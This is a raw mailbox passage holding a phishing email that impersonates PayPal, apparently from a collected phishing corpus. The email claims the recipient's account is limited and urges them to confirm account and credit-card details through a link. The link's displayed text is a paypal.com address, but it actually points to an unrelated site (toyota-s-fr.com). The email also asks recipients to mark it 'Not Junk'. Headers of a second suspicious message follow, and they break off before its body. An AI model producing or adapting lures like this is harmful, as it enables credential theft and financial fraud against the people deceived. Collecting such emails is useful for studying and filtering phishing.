From: "=?utf-8?Q?PayPaI=20Service?=" <backup1@bullu.lv> 
To: "jose@monkey.org" <jose@monkey.org>
Date: Mon, 21 Sep 2015 11:06:50 +0000
Subject: =?utf-8?Q?Account=20status=20limited?=
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_=aspNetEmail=_dbe6f01ed1d1423189eeb3e14bcf89a2"
Message-ID: <SEMPAKBOLONGe698f2dd1a7e44bfb37cde6da3b56d17@sempakbolong>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 180

--_=aspNetEmail=_dbe6f01ed1d1423189eeb3e14bcf89a2
Content-Type: text/html;
	charset="utf-8"
Content-Transfer-Encoding: quoted-printable

<=21DOCTYPE HTML PUBLIC =22-//W3C//DTD HTML 4=2E0 Transitional//EN=22>=0D=
=0A<HTML><HEAD>=0D=0A<STYLE type=3Dtext/css>=23yiv0063131905 =23yiv006313=
1905emailWrapperTable h1, =23yiv0063131905 =23yiv0063131905emailWrapperTa=
ble h2 =7Bfont-family:Verdana, Arial;margin-bottom:2px;font-size:15px;=7D=
=0D=0A=23yiv0063131905 =23yiv0063131905emailWrapperTable h3 =7Bfont-size:=
13px;=7D=0D=0A=23yiv0063131905 =23yiv0063131905emailWrapperTable h4 =7Bfo=
nt-size:11px;=7D=0D=0A=23yiv0063131905 a =7Bcolor:=23084482;text-decorati=
on:underline;=7D=23yiv0063131905 a=2Eyiv0063131905actionLink =7Bcolor:=23=
000;text-decoration:none;=7D=0D=0A=23yiv0063131905 hr =7Bdisplay:none;=7D=
=0D=0A=23yiv0063131905 =2Eyiv0063131905small =7Bfont-size:10px;=7D=0D=0A=23=
yiv0063131905 =2Eyiv0063131905ppid =7Bcolor:=23757575;=7D=0D=0A=23yiv0063=
131905 p =7Bmargin:11px 0;padding:0;=7D=0D=0A</STYLE>=0D=0A</HEAD>=0D=0A<=
BODY>=0D=0A<DIV id=3Dyui_3_16_0_1_1431884854094_2170 class=3Dyiv006313190=
5ppmail>=0D=0A<TABLE id=3Dyiv0063131905emailWrapperTable =0D=0Astyle=3D=22=
COLOR: =23333; FONT: 11px Verdana, Arial, Helvetica, sans-serif=22 =0D=0A=
cellSpacing=3D0 cellPadding=3D0 width=3D580 border=3D0>=0D=0A  <TBODY id=3D=
yui_3_16_0_1_1431884854094_2169>=0D=0A  <TR id=3Dyui_3_16_0_1_14318848540=
94_2235 vAlign=3Dtop>=0D=0A    <TD id=3Dyui_3_16_0_1_1431884854094_2234 c=
olSpan=3D3>=0D=0A      <TABLE id=3Dyiv0063131905emailLogo cellSpacing=3D0=
 cellPadding=3D0 width=3D=22100=25=22 =0D=0A      border=3D0>=0D=0A      =
  <TBODY id=3Dyui_3_16_0_1_1431884854094_2233>=0D=0A        <TR id=3Dyui_=
3_16_0_1_1431884854094_2238 vAlign=3Dtop>=0D=0A          <TD id=3Dyui_3_1=
6_0_1_1431884854094_2237><A =0D=0A            id=3Dyui_3_16_0_1_143188485=
4094_2236 href=3D=22https://www=2Epaypal=2Ecom/us=22 =0D=0A            re=
l=3Dnofollow target=3D_blank><IMG id=3Dyui_3_16_0_1_1431884854094_2239 =0D=
=0A            border=3D0 alt=3DPayPal =0D=0A            src=3D=22http://=
images=2Epaypal=2Ecom/en_US/i/logo/logo_emailheader_113wx46h=2Egif=22></A=
></TD></TR>=0D=0A        <TR id=3Dyui_3_16_0_1_1431884854094_2232>=0D=0A =
         <TD id=3Dyui_3_16_0_1_1431884854094_2231><IMG border=3D0 alt=3D=22=
=22 =0D=0A            src=3D=22http://images=2Epaypal=2Ecom/en_US/i/scr/p=
ixel=2Egif=22 width=3D1 =0D=0A            height=3D10></TD></TR>=0D=0A   =
     <TR>=0D=0A          <TD></TD></TR></TBODY></TABLE></TD></TR>=0D=0A  =
<TR id=3Dyui_3_16_0_1_1431884854094_2214>=0D=0A    <TD id=3Dyui_3_16_0_1_=
1431884854094_2213 colSpan=3D3><IMG =0D=0A      id=3Dyui_3_16_0_1_1431884=
854094_2212 style=3D=22VERTICAL-ALIGN: bottom=22 border=3D0 =0D=0A      a=
lt=3D=22=22 =0D=0A      src=3D=22http://images=2Epaypal=2Ecom/en_US/i/scr=
/scr_emailTopCorners_580wx13h=2Egif=22 =0D=0A      height=3D13></TD></TR>=
=0D=0A  <TR id=3Dyui_3_16_0_1_1431884854094_2168>=0D=0A    <TD style=3D=22=
BACKGROUND: repeat-y left 50=25; BORDER-LEFT: =23ddd 1px solid=22 =0D=0A =
   width=3D12><IMG border=3D0 alt=3D=22=22 =0D=0A      src=3D=22http://im=
ages=2Epaypal=2Ecom/en_US/i/scr/pixel=2Egif=22></TD>=0D=0A    <TD id=3Dyu=
i_3_16_0_1_1431884854094_2167 class=3Dyiv0063131905contentArea =0D=0A    =
style=3D=22WORD-WRAP: break-word; WIDTH: 530px; PADDING-BOTTOM: 12px; PAD=
DING-TOP: 12px; PADDING-LEFT: 12px; MARGIN: 0px; PADDING-RIGHT: 12px=22 =0D=
=0A    width=3D530>=0D=0A      <TABLE id=3Dyui_3_16_0_1_1431884854094_217=
8 =0D=0A      style=3D=22FONT: 1em Verdana, Arial, Helvetica, sans-serif=22=
 width=3D=22100=25=22>=0D=0A        <TBODY id=3Dyui_3_16_0_1_143188485409=
4_2177>=0D=0A        <TR id=3Dyui_3_16_0_1_1431884854094_2176>=0D=0A     =
     <TD id=3Dyui_3_16_0_1_1431884854094_2175 style=3D=22MIN-HEIGHT: 50px=
=22 =0D=0A          vAlign=3Dtop>=0D=0A            <STYLE type=3Dtext/css=
>=23yiv0063131905 =2Eyiv0063131905reminder ul, =23yiv0063131905 =2Eyiv006=
3131905reminder ol =7Bmargin-left:0;padding:4px 0 4px 20px;=7D=0D=0A=23yi=
v0063131905 =2Eyiv0063131905reminder ul li, =23yiv0063131905 =2Eyiv006313=
1905reminder ol li =7Bmargin-left:0;padding-left:0;=7D</STYLE>=0D=0A=0D=0A=
            <P id=3Dyui_3_16_0_1_1431884854094_2190 =0D=0A            sty=
le=3D=22TEXT-ALIGN: right; FONT: 11px Verdana, Arial, Helvetica, sans-ser=
if=22>Reference =0D=0A            =23PP-003-917-534-991</P>=0D=0A        =
    <TABLE id=3Dyui_3_16_0_1_1431884854094_2179 =0D=0A            class=3D=
yiv0063131905reminder =0D=0A            style=3D=22BORDER-TOP: =23ffcc00 =
1px solid; BORDER-RIGHT: =23ffcc00 1px solid; BORDER-BOTTOM: =23ffcc00 1p=
x solid; FONT: 1em Verdana, Arial, Helvetica, sans-serif; BORDER-LEFT: =23=
ffcc00 1px solid=22 =0D=0A            cellSpacing=3D0 cellPadding=3D0 wid=
th=3D=22100=25=22 border=3D0>=0D=0A              <TBODY id=3Dyui_3_16_0_1=
_1431884854094_2182>=0D=0A              <TR id=3Dyui_3_16_0_1_14318848540=
94_2181 =0D=0A              style=3D=22PADDING-BOTTOM: 10px; PADDING-TOP:=
 10px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; BACKGROUND-COLOR: =23ffff=
cc=22>=0D=0A                <TD><IMG =0D=0A                  style=3D=22V=
ERTICAL-ALIGN: middle; PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-L=
EFT: 10px; PADDING-RIGHT: 10px=22 =0D=0A                  border=3D0 alt=3D=
=22=22 =0D=0A                  src=3D=22http://images=2Epaypal=2Ecom/en_U=
S/i/icon/icon_alert_24wx24h=2Egif=22 =0D=0A                  width=3D24><=
/TD>=0D=0A                <TD id=3Dyui_3_16_0_1_1431884854094_2180 =0D=0A=
                style=3D=22PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDI=
NG-LEFT: 10px; PADDING-RIGHT: 10px=22>=0D=0A                  <TABLE id=3D=
yui_3_16_0_1_1431884854094_2186 =0D=0A                  style=3D=22FONT: =
1em Verdana, Arial, Helvetica, sans-serif; BACKGROUND-COLOR: =23ffffcc=22=
 =0D=0A                  cellSpacing=3D0 cellPadding=3D0 width=3D=22100=25=
=22 border=3D0>=0D=0A                    <TBODY id=3Dyui_3_16_0_1_1431884=
854094_2185>=0D=0A                    <TR id=3Dyui_3_16_0_1_1431884854094=
_2189>=0D=0A                      <TD id=3Dyui_3_16_0_1_1431884854094_218=
8><STRONG =0D=0A                        id=3Dyui_3_16_0_1_1431884854094_2=
187>Account Status =0D=0A                        Update</STRONG></TD>=0D=0A=
                      <TD id=3Dyui_3_16_0_1_1431884854094_2216 =0D=0A    =
                  style=3D=22WIDTH: 130px; TEXT-ALIGN: right=22><STRONG =0D=
=0A                        id=3Dyui_3_16_0_1_1431884854094_2215>Response =
=0D=0A                        required</STRONG></TD></TR>=0D=0A          =
          <TR id=3Dyui_3_16_0_1_1431884854094_2184>=0D=0A                =
      <TD id=3Dyui_3_16_0_1_1431884854094_2183>Check your =0D=0A         =
               account details, check your credit card</TD>=0D=0A        =
              <TD id=3Dyui_3_16_0_1_1431884854094_2217 =0D=0A            =
          style=3D=22TEXT-ALIGN: right=22>Upon =0D=0A                  re=
ceipt</TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBOD=
Y></TABLE>=0D=0A      <TABLE id=3Dyui_3_16_0_1_1431884854094_2211 width=3D=
=22100=25=22>=0D=0A        <TBODY>=0D=0A        <TR>=0D=0A          <TD>=0D=
=0A            <H2><SPAN class=3Dyiv0063131905outlookFix>PayPal account h=
as been =0D=0A            limited=21</SPAN></H2></TD></TR></TBODY></TABLE=
>=0D=0A      <P id=3Dyui_3_16_0_1_1431884854094_2174>PayPal Customer  ID =
=0D=0A      PP1781</P>Recently, there=27s been activity in your PayPal ac=
count that =0D=0A      seems unusual compared to your normal account acti=
vities=2E Please log in to =0D=0A      PayPal to confirm your identity an=
d remove limitation=2E =0D=0A      <P id=3Dyui_3_16_0_1_1431884854094_219=
1>To help protect your account, no one =0D=0A      can receive money, sen=
d money, or withdraw money=2E In addition, no one can =0D=0A      add mon=
ey to your account, add a card, add a bank account, remove any bank =0D=0A=
      accounts, remove credit cards, send refunds, or close your account=2E=
</P>=0D=0A      <H3 id=3Dyui_3_16_0_1_1431884854094_2244><SPAN =0D=0A    =
  style=3D=22COLOR: =23333; FONT: bold 13px Verdana, Arial, Helvetica, sa=
ns-serif=22>What=27s =0D=0A      going on?</SPAN></H3>=0D=0A      <P id=3D=
yui_3_16_0_1_1431884854094_2210>We noticed some unusual log in =0D=0A    =
  activity with your account=2E Please confirm your account to help us ch=
eck =0D=0A      that no one has logged into your account without your per=
mission=2E</P>=0D=0A      <STYLE type=3Dtext/css>=23yiv0063131905 =2Eyiv0=
063131905howTo ul, =23yiv0063131905 =2Eyiv0063131905howTo ol =7Bmargin-le=
ft:0;padding:4px 0 4px 20px;=7D=0D=0A=23yiv0063131905 =2Eyiv0063131905how=
To ul li, =23yiv0063131905 =2Eyiv0063131905howTo ol li =7Bmargin-left:0;p=
adding-left:0;=7D</STYLE>=0D=0A=0D=0A      <TABLE id=3Dyui_3_16_0_1_14318=
84854094_2195 class=3Dyiv0063131905howTo =0D=0A      style=3D=22FONT: 11p=
x Verdana, Arial, Helvetica, sans-serif=22 cellSpacing=3D0 =0D=0A      ce=
llPadding=3D10 width=3D=22100=25=22 border=3D0>=0D=0A        <TBODY id=3D=
yui_3_16_0_1_1431884854094_2194>=0D=0A        <TR id=3Dyui_3_16_0_1_14318=
84854094_2193>=0D=0A          <TD id=3Dyui_3_16_0_1_1431884854094_2192 =0D=
=0A          style=3D=22BACKGROUND-COLOR: =23e8f1fa=22>=0D=0A            =
<H4>What to do</H4>Log in to your PayPal account as soon as =0D=0A       =
     possible=2E We may ask you to confirm information you provided when =
=0D=0A            you created your account to make sure you=27re the acco=
unt holder=2E =0D=0A            Submit your information as soon as possib=
le, so we can solve it =0D=0A            quickly=2E =0D=0A            <P>=
You should also do the following for your own protection:</P>=0D=0A      =
      <UL id=3Dyui_3_16_0_1_1431884854094_2197>=0D=0A              <LI><S=
TRONG>Check your account details </STRONG>(address, email, =0D=0A        =
      phone, card number, etc=2E) to make sure they=27re accurate=2E =0D=0A=
              <LI id=3Dyui_3_16_0_1_1431884854094_2209><STRONG>Review you=
r account =0D=0A              activity </STRONG>to make sure you recogniz=
e the transactions made =0D=0A              recently=2E =0D=0A           =
   <LI id=3Dyui_3_16_0_1_1431884854094_2196><STRONG>Follow this link to =0D=
=0A              remove your limitation :</STRONG><BR><A =0D=0A          =
    id=3Dyui_3_16_0_1_1431884854094_2252 =0D=0A              href=3D=22ht=
tp://toyota-s-fr=2Ecom/administrator/help=22 rel=3Dnofollow =0D=0A       =
       target=3D_blank>https://www=2Epaypal=2Ecom/home/webapps/redir-auth=
/60a70f15f6/remove-limitation/<BR>infoscr?cmd=3Daccount-information=26amp=
;detail=3Daa67520fe006e155b6d547cfc6f504a8<BR>=26amp;lim_session=3D891b27=
0df165199f2dbbad781d969deef6dc82cd=23home</A></LI></UL></TD></TR></TBODY>=
</TABLE><BR>=0D=0A      <P><STRONG>=22If this message sent as Junk or Spa=
m, it=27s just an error by =0D=0A      our new system, please click at No=
t Junk or Not Spam=22</P></STRONG>=0D=0A      <H3 id=3Dyui_3_16_0_1_14318=
84854094_2198><SPAN =0D=0A      id=3Dyui_3_16_0_1_1431884854094_2207 =0D=0A=
      style=3D=22COLOR: =23333; FONT: bold 13px Verdana, Arial, Helvetica=
, sans-serif=22>What=27s =0D=0A      next?</SPAN></H3>=0D=0A      <P id=3D=
yui_3_16_0_1_1431884854094_2199>Let=27s work together to restore your =0D=
=0A      account=2E After you complete all of the tasks, we should respon=
d within 72 =0D=0A      hours=2E</P>=0D=0A      <P id=3Dyui_3_16_0_1_1431=
884854094_2200>Thanks for choosing PayPal=2E If you =0D=0A      need help=
 or have any questions, call us at 1-888-221-1161, 4:00 AM to =0D=0A     =
 10:00 PM Pacific Time Monday through Friday, 6:00 AM to 8:00 PM Pacific =
=0D=0A      Time Saturday and Sunday, Please note that hours of operation=
 may vary on =0D=0A      holidays=2E</P>=0D=0A      <P id=3Dyui_3_16_0_1_=
1431884854094_2201>Sincerely,<BR>PayPal</P></TD>=0D=0A    <TD style=3D=22=
BORDER-RIGHT: =23ddd 1px solid; BACKGROUND: repeat-y left 50=25=22 =0D=0A=
    width=3D12><IMG border=3D0 alt=3D=22=22 =0D=0A      src=3D=22http://i=
mages=2Epaypal=2Ecom/en_US/i/scr/pixel=2Egif=22></TD></TR>=0D=0A  <TR>=0D=
=0A    <TD colSpan=3D3><IMG border=3D0 alt=3D=22=22 =0D=0A      src=3D=22=
http://images=2Epaypal=2Ecom/en_US/i/scr/scr_emailBottomCorners_580wx13h=2E=
gif=22 =0D=0A      height=3D13></TD></TR></TBODY></TABLE>=0D=0A<TABLE id=3D=
yiv0063131905emailFooter =0D=0Astyle=3D=22COLOR: =23333; PADDING-TOP: 20p=
x; FONT: 10px Verdana, Arial, Helvetica, sans-serif=22 =0D=0AcellSpacing=3D=
0 cellPadding=3D0 width=3D580 border=3D0>=0D=0A  <TBODY id=3Dyui_3_16_0_1=
_1431884854094_2247>=0D=0A  <TR id=3Dyui_3_16_0_1_1431884854094_2246>=0D=0A=
    <TD id=3Dyui_3_16_0_1_1431884854094_2245>=0D=0A      <DIV id=3Dyui_3_=
16_0_1_1431884854094_2253 class=3Dyiv0063131905footerLinks =0D=0A      st=
yle=3D=22PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN=
: 5px 0px; PADDING-RIGHT: 0px=22><A =0D=0A      href=3D=22https://www=2Ep=
aypal=2Ecom/us/cgi-bin/helpweb?cmd=3D_help=22 rel=3Dnofollow =0D=0A      =
target=3D_blank>Help Center</A><SPAN style=3D=22COLOR: =23ccc=22> =7C </S=
PAN><A =0D=0A      id=3Dyui_3_16_0_1_1431884854094_2252 =0D=0A      href=3D=
=22https://www=2Epaypal=2Ecom/us/security=22 rel=3Dnofollow =0D=0A      t=
arget=3D_blank>Security Center</A></DIV>=0D=0A      <P id=3Dyui_3_16_0_1_=
1431884854094_2251>This email was sent by an automated =0D=0A      system=
, so if you reply, nobody will see it=2E To get in touch with us, log =0D=
=0A      in to your account and click =22Contact Us=22 at the bottom of a=
ny page=2E</P>=0D=0A      <P id=3Dyui_3_16_0_1_1431884854094_2250>Copyrig=
ht =26=23169; 2015 PayPal, Inc=2E All =0D=0A      rights reserved=2E PayP=
al is located at 2211 N=2E First St=2E, San Jose, CA =0D=0A      95131=2E=
</P><IMG border=3D0 alt=3D=22=22 =0D=0A      src=3D=22https://102=2E112=2E=
2O7=2Enet/b/ss/paypalglobal/1/G=2E4--NS/123456?pageName=3Dsystem_email_PP=
1781=22 =0D=0A      width=3D1 height=3D1> <IMG border=3D0 alt=3D=22=22 =0D=
=0A      src=3D=22https://t=2Epaypal=2Ecom/ts?ppid=3DPP1781=26amp;cnac=3D=
US=26amp;rsta=3Den_US=26amp;unptid=3D4eda5f1e-fcad-11e4-9d6f-d8d385e00ebc=
=26amp;cust=3DXLX7BLJQQQ67Q=26amp;e=3Dop=26amp;mchn=3Dem=26amp;s=3Dci=26a=
mp;mail=3Dsys=26amp;page=3Dmain:email::::::=22 =0D=0A      width=3D1 heig=
ht=3D1>=0D=0A      <P id=3Dyui_3_16_0_1_1431884854094_2248 =0D=0A      cl=
ass=3D=22yiv0063131905xptFooter yiv0063131905ppid=22>PayPal Email ID PP17=
81 - =0D=0A      48ddc600c7ed9</P></TD></TR></TBODY></TABLE></DIV></BODY>=
</HTML>=0D=0A

--_=aspNetEmail=_dbe6f01ed1d1423189eeb3e14bcf89a2--

From service@access.com  Mon Sep 21 12:56:38 2015
Return-Path: <service@access.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 53522F4152
	for <jose@login.monkey.org>; Mon, 21 Sep 2015 12:56:38 -0500 (CDT)
Received: from smtpin18.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay03.b.hostedemail.com (Postfix) with SMTP id 16B101844BA
	for <jose@login.monkey.org>; Mon, 21 Sep 2015 17:56:38 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70658006076.18.ants53_1cc25b64e885a
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 1,0,0,,d41d8cd98f00b204,service@access.com,:service@access.com,RULES_HIT,0,RBL:169.232.46.189:@access.com:.lbl8.mailshell.net-62.12.0.2 64.201.201.201;169.232.46.189-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fe,MSBL:0,DNSBL:neutral,Custom_rules:0:2:0
X-HE-Tag: ants53_1cc25b64e885a
X-Filterd-Recvd-Size: 2700
Received: from tx3-csb2.smtp.ucla.edu (tx3-csb2.smtp.ucla.edu [169.232.46.189])
	by imf14.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 21 Sep 2015 17:56:37 +0000 (UTC)
Received: from [128.97.64.94] (mchshp10.physics.ucla.edu [128.97.64.94])
	by rx-csb2.smtp.ucla.edu (8.14.4/8.14.4/Debian-4) with ESMTP id t8LHWYoM011639;
	Mon, 21 Sep 2015 10:42:15 -0700
Message-Id: <201509211742.t8LHWYoM011639@rx-csb2.smtp.ucla.edu>
Content-Type: multipart/alternative; boundary="===============0413367542=="
MIME-Version: 1.0
Subject: Re: Important Notification
To: Recipients <service@access.com>
